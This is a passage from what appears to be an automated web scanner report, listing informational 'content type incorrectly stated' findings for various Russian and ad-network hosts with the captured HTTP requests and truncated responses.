The response contains the following Content-type statement:

Content-Type: text/javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&uid=ZC45X9Axu6NOUFfX_289668&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303741233200-54504055902361870&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C355083964F0D94352A7538219BE1B4; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 25 Apr 2011 14:23:42 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289668");

33.13. http://foreign.dt00.net/zones/form4.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://foreign.dt00.net
Path:	/zones/form4.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /zones/form4.js HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:34:30 GMT
Content-Type: application/x-javascript
Content-Length: 5615
Last-Modified: Wed, 08 Dec 2010 19:18:44 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

var searchFields = Array();
var searchPhrases = Array();
var searchLinks = Array();
var searchActions = Array();
var beforeSearch = Array();
var afterSearch = Array();

...[SNIP]...

33.14. http://foreign.dt00.net/zones/zone1.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://foreign.dt00.net
Path:	/zones/zone1.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

33.15. http://foreign.dt00.net/zones/zone23.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://foreign.dt00.net
Path:	/zones/zone23.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

33.16. http://foreign.dt00.net/zones/zone25.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://foreign.dt00.net
Path:	/zones/zone25.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

33.17. http://foreign.dt00.net/zones/zone40.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://foreign.dt00.net
Path:	/zones/zone40.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

33.18. http://games.webalta.ru/public/css/style-games.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://games.webalta.ru
Path:	/public/css/style-games.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-games.css HTTP/1.1
Host: games.webalta.ru
Proxy-Connection: keep-alive
Referer: http://games.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 22 Dec 2010 12:50:51 GMT
ETag: "e100b5-16b4-497ff33f520c0"
Accept-Ranges: bytes
Content-Length: 5812
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.link-01 {
...[SNIP]...

33.19. http://goods.adnectar.com/analytics/get_avia_js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://goods.adnectar.com
Path:	/analytics/get_avia_js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

Response

33.20. https://hourly.deploy.com/images/logo.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://hourly.deploy.com
Path:	/images/logo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/logo.jpg HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=d83017703d58414f6c12

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:31 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 04 Aug 2009 06:26:33 GMT
ETag: "60426b-140e-f7bb9840"
Accept-Ranges: bytes
Content-Length: 5134
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 13:39:31 GMT
Connection: close
Content-Type: image/jpeg

GIF89a..9...........H9.SE.`SZXY...fef.............i`0-....JHI....kb.F9..........RH...............XVW..........H=...=;<.F<.......um.vn.G=..vLIJ................vh...._R.......TE..........I6..."......_U.
...[SNIP]...

33.21. http://img.webalta.ru/public/css/style.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://img.webalta.ru
Path:	/public/css/style.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style.css HTTP/1.1
Host: img.webalta.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:20:00 GMT
Content-Type: text/css
Content-Length: 4614
Last-Modified: Tue, 08 Feb 2011 08:10:02 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Tue, 26 Apr 2011 14:20:00 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...

33.22. http://img.webalta.ru/public/js/webalta.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://img.webalta.ru
Path:	/public/js/webalta.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/webalta.js HTTP/1.1
Host: img.webalta.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:20:00 GMT
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 6817
Last-Modified: Mon, 18 Apr 2011 13:24:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Tue, 26 Apr 2011 14:20:00 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

// version 2

function $$(target)
{
   return document.getElementById(target);
}

function newsSetCategory(n)
{
   var i;
   var item;
   var button;

   n = n || 0;

   for(i = 0; i < 10; i++)

...[SNIP]...

33.23. http://js.dt00.net/public/smi/elastic/24.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://js.dt00.net
Path:	/public/smi/elastic/24.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

33.24. http://kino.webalta.ru/banners.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://kino.webalta.ru
Path:	/banners.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

33.25. http://kino.webalta.ru/sc/l/loach.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://kino.webalta.ru
Path:	/sc/l/loach.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /sc/l/loach.js HTTP/1.1
Host: kino.webalta.ru
Proxy-Connection: keep-alive
Referer: http://kino.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:22:15 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:17:52 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:22:15 GMT
Cache-Control: max-age=86400
Content-Length: 12813

var clip_id;
var channel_id;
var autoplay;
var clip_url = '';
var p_uuid = '';
var sessid = '';
var userid = '';
var username = '';
var notWin = (navigator.userAgent.indexOf('Win') == -1);
var notIE =
...[SNIP]...

33.26. http://l-files.livejournal.net/userapps/10/image previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l-files.livejournal.net
Path:	/userapps/10/image

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

Response

33.27. http://l-files.livejournal.net/userapps/2/image previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l-files.livejournal.net
Path:	/userapps/2/image

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/2/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 795933937 795900092
Via: 1.1 varnish
Age: 165875
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Thu, 03 Feb 2011 11:12:23 GMT
Content-Length: 34106
Connection: keep-alive

.PNG
.
...IHDR...x...x.....9d6.... pHYs................ cHRM..z%..............u0...`..:....o._.F....IDATx...w.e.Y..V.{.X.ruW.nI..V..dI.A...6`0..0..f.C0.30..0.5.f<c<`...s.rR.r...].U...T...^..c..n...
...[SNIP]...

33.28. http://l-files.livejournal.net/userapps/3/image previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l-files.livejournal.net
Path:	/userapps/3/image

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/3/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 146361845 146338538
Via: 1.1 varnish
Age: 177030
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Wed, 02 Feb 2011 13:36:22 GMT
Content-Length: 7904
Connection: keep-alive

.PNG
.
...IHDR...x...x.............tEXtSoftware.Adobe ImageReadyq.e<....PLTEb3)u....>oK......L..S.t...1.zH..w..V.....L.......h..P.........A..-...\......u$..;..
.....[......m....S.....j.x...ciu.....f
...[SNIP]...

33.29. http://l-files.livejournal.net/userapps/4/image previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/4/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1545808843 1545808820
Via: 1.1 varnish
Age: 250126
Date: Mon, 25 Apr 2011 14:31:00 GMT
Last-Modified: Tue, 15 Feb 2011 08:05:38 GMT
Content-Length: 33581
Connection: keep-alive

.PNG
.
...IHDR...x...x.............sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....IDATx^...|TW......$...n..L&..........Z.Xq)R(...X..ii..F....m....|...(mw............k....=
...[SNIP]...

33.30. http://l-files.livejournal.net/userapps/9/image previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l-files.livejournal.net
Path:	/userapps/9/image

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /userapps/9/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain; charset=UTF-8
X-Varnish: 1630994405 1630993912
Via: 1.1 varnish
Age: 177729
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Wed, 02 Feb 2011 13:37:38 GMT
Content-Length: 34553
Connection: keep-alive

.PNG
.
...IHDR...x...x.............IDATx.....\..5z...r.....V..3.B..3...lc{l..=.......l..g.....l.....I(K-.:...............5WR....>..............g5.....Y(.....D.8Q...20.J.t..i...u....6.IB`,..qJ......
...[SNIP]...

33.31. http://l-files.livejournal.net/vgift/445/small previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l-files.livejournal.net
Path:	/vgift/445/small

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /vgift/445/small HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1355145633 1355145630
Via: 1.1 varnish
Age: 174245
Date: Mon, 25 Apr 2011 14:20:43 GMT
Last-Modified: Fri, 26 Mar 2010 17:52:18 GMT
Content-Length: 18393
Connection: keep-alive

.PNG
.
...IHDR...d...d.....p..T....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..GWIDATx^..ux...6.9gN{
U.P.......\..!....%..wwwwww.!....w....o..m....=.^W......Z...7_|....+.
...[SNIP]...

33.32. http://learn.shavlik.com/shavlik/userCheck.cfm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://learn.shavlik.com
Path:	/shavlik/userCheck.cfm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shavlik/userCheck.cfm HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.6.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

num0

33.33. http://limg.imgsmail.ru/mail/ru/css/search_top.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://limg.imgsmail.ru
Path:	/mail/ru/css/search_top.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /mail/ru/css/search_top.css?1 HTTP/1.1
Host: limg.imgsmail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:24:54 GMT
Content-Type: text/css
Last-Modified: Fri, 17 Sep 2010 12:08:28 GMT
Connection: keep-alive
Expires: Mon, 02 May 2011 14:24:54 GMT
Cache-Control: max-age=604800
Content-Length: 4085

/* Other */
td.on div div div {padding:0 !important;}
td.on div div {padding: 2px 5px;}
.search_bare {width:99%;}
.search_bare td{vertical-align:middle; color: #FFFFFF;}
.search_bare .inp{width:5
...[SNIP]...

33.34. http://mbox9e.offermatica.com/m2/eset/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mbox9e.offermatica.com
Path:	/m2/eset/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

33.35. http://my.webalta.ru/feed/l.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/feed/l.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

33.36. http://my.webalta.ru/public/engine/app.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/app.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/app.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:52 GMT
Content-Type: application/x-javascript
Content-Length: 27122
Last-Modified: Tue, 23 Dec 2008 15:25:59 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:52 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function fNewBlock(block_data)
{
       function fLdrTransfer(data)
       {
           if(!fw.data.isObj(data)) return false;
           var res = fw.io.transfer(this._iohndl, data);
           return true;
       }
       function
...[SNIP]...

33.37. http://my.webalta.ru/public/engine/catalog/general.txt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/catalog/general.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/catalog/general.txt HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:58 GMT
Content-Type: text/plain
Connection: keep-alive
Keep-Alive: timeout=20
Last-Modified: Tue, 14 Apr 2009 09:21:09 GMT
ETag: "15d8393-66f-49e45585"
Accept-Ranges: bytes
Content-Length: 1647

...{widgets:{
0:{name:'...... ........',type:'gameboss',url_id:'80'},
1:{name:'........................ ........ ........',type:'r4games',url_id:'',par_1:''},
2:{name:'............ - ef the game',t
...[SNIP]...

33.38. http://my.webalta.ru/public/engine/fw/fw_cookies.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/fw/fw_cookies.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/fw/fw_cookies.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:30 GMT
Content-Type: application/x-javascript
Content-Length: 2347
Last-Modified: Wed, 12 Nov 2008 09:08:15 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:30 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function setCookie( name, value, path ) {

var expdate = new Date ();
expdate.setTime(expdate.getTime() + (3650 * 24 * 60 * 60 * 1000));
var str2 = "expires=" + expdate.toGMTString();
var
...[SNIP]...

33.39. http://my.webalta.ru/public/engine/move.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/move.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/move.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:51 GMT
Content-Type: application/x-javascript
Content-Length: 34213
Last-Modified: Wed, 26 Nov 2008 08:04:50 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:51 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function setOpacity(value) {
testObj.style.opacity = value/10;
testObj.style.filter = 'alpha(opacity=' + value*10 + ')';
}

function hasClassName(elem, cname)
{
if (!elem) return
...[SNIP]...

33.40. http://my.webalta.ru/public/engine/page.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/page.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

